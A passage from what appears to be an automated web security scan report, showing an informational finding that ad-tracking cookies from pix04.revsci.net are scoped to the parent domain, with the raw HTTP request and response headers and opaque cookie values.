rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7rAINKTK4ibUV9PolQNisncWnrIs+kMKqUUUZKyjTigWlX9pmQyiPpn1WLZYGIVHHqRL8VuyK4KSktWpKfhIdHKBwclAI+6iD7zTEz/f+knqf0t3kASKBCGuEtdoCwsxK4g0ZL+njwXWyIDG0cYZK9LlLeIimfSHbcpOAPGOiIiNgVsayI2+T7bn4d5BySofs7vvnu0VvIFgk838Aqt3SFZsuYuY8c7p2egEAEBsVwxqEHGE5IfWozZa+DivrPeu4dqSUVtCO+gsiEzWR1tZk0HXAItV7xygYQnz90V2cZDFtqSBBEfPMpGm0aax+8r+mMrgLznVn3BGQgwy6pazAQZg9pc0lkr2gvlB8HAf5PGlkfE2QFdMEf6xur7hQuTeHV3bdCkUxmbUFw5GFupSL8tTLF8/HXtMt/wbmpZBthpsR6lfPwJTGwtQp3Qql8Y/f4X4WeEmvMLPXKTtRccMMmSRVDI7IBcwmYK6mp1wEzq7ZHPu9iPrPSzpK3Seet1yGY1b1pQ+MEL8FbeIr4FVXSRR2kVbRbb3zppT4M6RKsOqez6ll6xRUDQP+zySfL7nRxX5at/PmBczxNHOZDAT50BMMEx6wNSmldE3eVu4wDEHOzhx3E/BCZB0eE/zWpb23p1c8fTmMS21juv4cMEEvTt3lVnW35mH9cA3Kjk1gtOQ80CKe8eDItkcaRcrp9+ShL1micr6IwuDgfLmFFdXL5Z0NAHOf2cxmAhBEMIWdENpdsTGZWgh9fX5cKm+9Xs/1gN5Z9FbVFf4ah5FZeaCOSufSnTwvmqfAZ1I; rtc_m6-a=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_D9GE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_m6-a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4kmhOHMQJvAtY6gq+mkAZPosg7ZjSjmgIGbYEtpU+w6+9L4ioURjDVUZb5s2bJaZJyc3lSTsOodoc+LzjgnPXWfftsdz6As2U+S4m3sZ93GnJHkwYOujESwdtKPV2XiklIXPPxY08/+jghS00wcrqZXadzeLZbfrn9ShlwBQ2xmbpA283BtMERrEkp0Jl7AlGaEi8uw/pmdbkTDTCxPk3RxS+r7mTK51H+dLGRbW1fSty/wzVcn4GiBJEhk/0uP0JFLwQAUiAigtm0ZNVycI9AGE/kbo+Gm2GaMwx2IDZVAxGSGKhVfyxDow7LMEpP+/5AxB2aqXpAeWvKTgzd0wbPD0VLITZHo4oKcp6znXDZ/0QtZDxMyG+eh98ur0yF4RcpWqIFje74P6+IbKGLCNtlohZ7Nav9yQLQTHzDaAO7J7qQoTim2Po4jbIQeMv4V1ddr3kuTn07MfTvRxxboUYTCuOfPSwiCu87XOT4VkUrTUsApznyu8h9UrtX1A+eGVmZHV1i9H5FVlSMYV26zae1BGTaVDu19oJh0g6OQ/s8arz/cmOTmFie/7fnhKouJ+5wZJLzMT79s7HngcVxnNORtmtkxap8qWggfgODBjtQ8ig0EDjcYoKBHHKBVVdroIASuQN7mVEL0K0TzsgMMWXaKWYBW9/iOx9pWkUNPSZL0M2RzvR9D/7jyN/29EhW9QJ959OWVt+j0usQmpIR7mRCF/ajlARlpFSZwaumyPoKorInGvgmN+DJxH9uO8o1yz+7oRSaHzNp10QI1YjBXWMklCIpzZV9sYpcGp7usKbFyeozpl+ePO2/9SPMsdM6qLGHvuxxE=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/
Set-Cookie: rtc_cPyi=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:40:34 GMT
Content-Length: 1389

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.72. http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/912026619.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4k+huXIQJ/AtY6gq+ml3T51epqLBQmL8IGbY2gQ4O3XYKvnesHJskvAjloepK631i+WEhWmrGkG9POozi7inp/3S9t0/IkxBMjdPeK2r1xOnBR+A8KgmFzpR3pMg5V0STXRc5h/sA2NQ8SJlLg63pEKsg0I5wRad6dbI4VuGWq0qyRY6oFRDcRF2ywDPp/l2ZM/I/17S1FdjMhMyzTpwiyFgMBvjzji/YDIpZH9+iRia02zqup5Uc4RB7fdpzSNwFedZ7rF5pmLypIrhS6jTxXdihxtKUvnVp3q4CZDvvMwKRSQUBIW8aKH6yqDjLLFCxPSykE7ev85UXsanukFhZ9jYJjEs313/TmtNJZjZKdkEwlKP+EpScAuabJwc2MVWU5pKqCBEiB/oMmqVrjImbeGElhPS91RP79kBRGAMI3fkhrHTOrUB9Nj+DoZKH4lbg3Y3J9fn8ovUmELM6+fTLDZn64dD6QhCAEzHeyhtNq/gwTK3++V4LRJN+nSAfcUw3lASsUZNnfJXTu8Q6bEhNzGSJQRi7/mcA+9ehrTH4KDTZbkJv7PT4yxIEMkCSgxLn6HSWeEolJQXExDVPWrP/cJ3hVepclllkb9wBj0AY1yZEwqutB2h4qxbtUMBqUHh6OSHAx9XJ2YkwMZHL/CCmBi2npcpOJ+5/TUDcglD1Y7oRv43ayXSghpU5rlQGkOeKu+yDGQAXXWVB4yBSqHOppm9zCE0PdS2yri1Rj97MbjhcH+2CxSiFDOCK/fCv/8tlGv96HYrlNfrIVhi5C6uRanp26QbkxI=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
rtc_1ITi=MLvv+TMxZohq566eiyy8UbOz7zLy9mEQ8mXXGp+M0638wei+ulFK2S4Ev1MTpaDGwTDIzNSh73JhXWRrYe1q8VFI58tTtWhCdbI4MzA3YYxxXubjq8FSgOMmMG9sH0gUiVnOQ65fXoi3mopY7JL9/gppSNiBtjY1I+h5ZnQDjeIrP2A07R9E4B0/DoWFrvtn5GQlDn/QR3osWe5Qq5jlHKHXjt9aTgNU+htJJCoHZr0vwt5BgumbXpb6EsGpW168HIMJDNaMDk/AHu8AoumgsHIc49RABGlc5sPzY78IAfLZevbFOT9enhBT5iTPx8uhKb6ICuiU1KndCPNBUzRwqFiGUErzYHBI82KY2aAuTGaePJI6sJZsbp1aH1n8gQdTnWO2HiRS2vf7NHPlTlumMDGb5I1n3eQhJau8lvMC65dkcxS+qzPNuXXZtiKSp8AqpfiC4j5H5Gs6I/wJePaMa/H/bKye2StM1J3uRbUuh7Qjix0Q65p+KrO58APdAnkl2ykfxv7Q6Mkh8c0ZSg3OReCY3/iHqvWzwk2TUfctz3UnQ5fZRbtqqIDTl2A6A5OeQimMEhDTu1P5EcdcGutHW7DsiuBV2NQ6toA6l/cx84UbT7CfxCUTprpW02CfMnxd/M/YgPxK3F1+ahsMNGWsBVgWHYi9ELphviFiySqgZY8OVxLe5ON/NN3zM5GGddLiBiAXJn6Iyk8XVV6YLYZ/CgWVWvEJHiiX521RyrH3mhvARcvb943dl10QuzcIIoHN2/tBinpTl/y99V44Vs31Ci0yLc+8HOcgDUbaDUlToDT6shAnbwRMyvTJoN47EaH+qn8tLpx9rnTC/yIXatLgCnRv6aYLEy3U8pJDT9wtkd6KT2qZbPcQBgM4ORrhxBc9O31ihCY1TpbDm6tm9V7H1gw45MCvfiqCNYD0WeL0BdsYGEp/0zbPFivFpw4gOTqA2UYMg5eT0TZWZWBpM2XZSAGmFqO2btOFYF1a2MIJNoyJh80yafr4NiTY1OxXjafjc+RMD0giT7KsaW2azmFCvcEn60Z/REYg+MgZhecSnRCHa2jUHNdmQ9Co0JvWgSQrK7rJ0axxgV7pCoLZ7ufXMFzrngcxW/aHeEfuxx2TPMEm+l+qn8yQe1GdQ8OTCrEhhRyzyvNZgxPi+sGIfcqlCX+ZH3ramk2Uf/PZmGc1Q8bttSBIVkuefEQOgcbng3f6sNAx7yQU6ptBrFV0lWFsni+DR+2TNoyVYy/PfomMhoRWE3RhkSrwqbrC8HWnt9hLUZoJwgb/OIqiE/aG4B+pHzGDO+DAQ0a7J+iO1iXPs5qLi1qftz/gGPh4A/pD2/3JiyXka9hUKr0HSpd+wm8Wv1qupg3niAOmB0pjoq28uVdCjpFmiN4MIut0J9pZHhfDtxy+KxP73TCH6U3bXBe7sQ4CwS1F3pVnjZ3pLEeLv7WQHYg4l1fZGzLxcDS3lE+8Z3RHoqRSavkip/CbNnQC16Hya++KY43gJqueMMzRKaKjcEYongbB84OK+MTm25rmvDzjzCOY37vpquwfGQLWb6ZFyVaj3Z2cxpiwLsLB+vRNm8QLNfYpjOYeiB/l9UoSaak5MxlMKmfRkSCJ0irsFzPMZ+cw98Ea3hrEQp1IOMsFiSNRoeJEfcnGvvI8lpWyi3lyg9sD7InjJ4p1X0HICjg0R60ZJLmZXCpoxIgJ9MPDM3H1UUM+OimEF1QRRY5mPcL3F3svNeNg3YHQkziFmnofRrlYeVilqA41LSRqy2L+ohJhdS6v3gYurmUz+0fAj96bn6nrPTXOtWRpWbuxcOoiBBgAUBBEdI+wrnpxgWKgyP/bjb0iWgSBsVLB/siGc7scEltOZ9OYgdtlxRgjUTGVWIepPc6vFRPxQclWLFDF41U2NqCywsDhtiahdxqGbXlO6Qxl8VmBDFLUN+sZS1rPpJqpx2mXdlk4kRHaUj1wuxzP8N3kWus/GfRJZOI45HCzP6enRhHSk55r31qpE0f6tR9GqEYNKexw+5BZNv++TVWQwfpWUju9h4WUTTrnn+TcPIqFm6XKPlXWAZwIhbd281h3iBntLJZem6g46X4KOOF4tCzyHCIAa1SsNbwzuIXRHWuk4oq83ETUWBxsj4OfCAhj2yBLQsRJyQy7Y9oiV1IPKrjS1XCVgUt7i25t3/yeG6qLEQz6EEePBKxMF9/03+eskjnAXrCv3fHRn3K7YenZ+MleOA3+hzA1i3BsU6fW9FFyjaz5HHBZHRCMmWqCzekJFk270v2M52sQwlVsM43zidkJZq1Du54N3YBKE2DPSVmgt9HPBATlZgcHuAmyPEovsQAttyA8XMhhHuh22vPjKeKvTtesKfKy54iluN2AZwBF1gSW4Udyt5EABLZ9bN6/BLcC5Lyr5Wko/ftu6UfNIBGjxPCnpn9boSr2fjdI0gN8dT21bv+LH60se77fvJnIaiSQoOM/nn9rEOJ2YuOmkIdHwGq68kjpsuJxw3LM6cwhV99tcExgkSUn7xAL9leF597CEOJ0hdlvmviBcwyRa9eHdT8sDeZ299Dia+m23s0ko0s9PpbzWSjTgwULxx4EVzB78hK5TIjOW1YkHftg4P6C3WZ5YgRKg+TBH1wA7i1GgiNe788gpZfzXQ4FHeSRd0vaAH0PW8cKW7goiqPNd2u6282Vmien5MP0; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/912026619.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/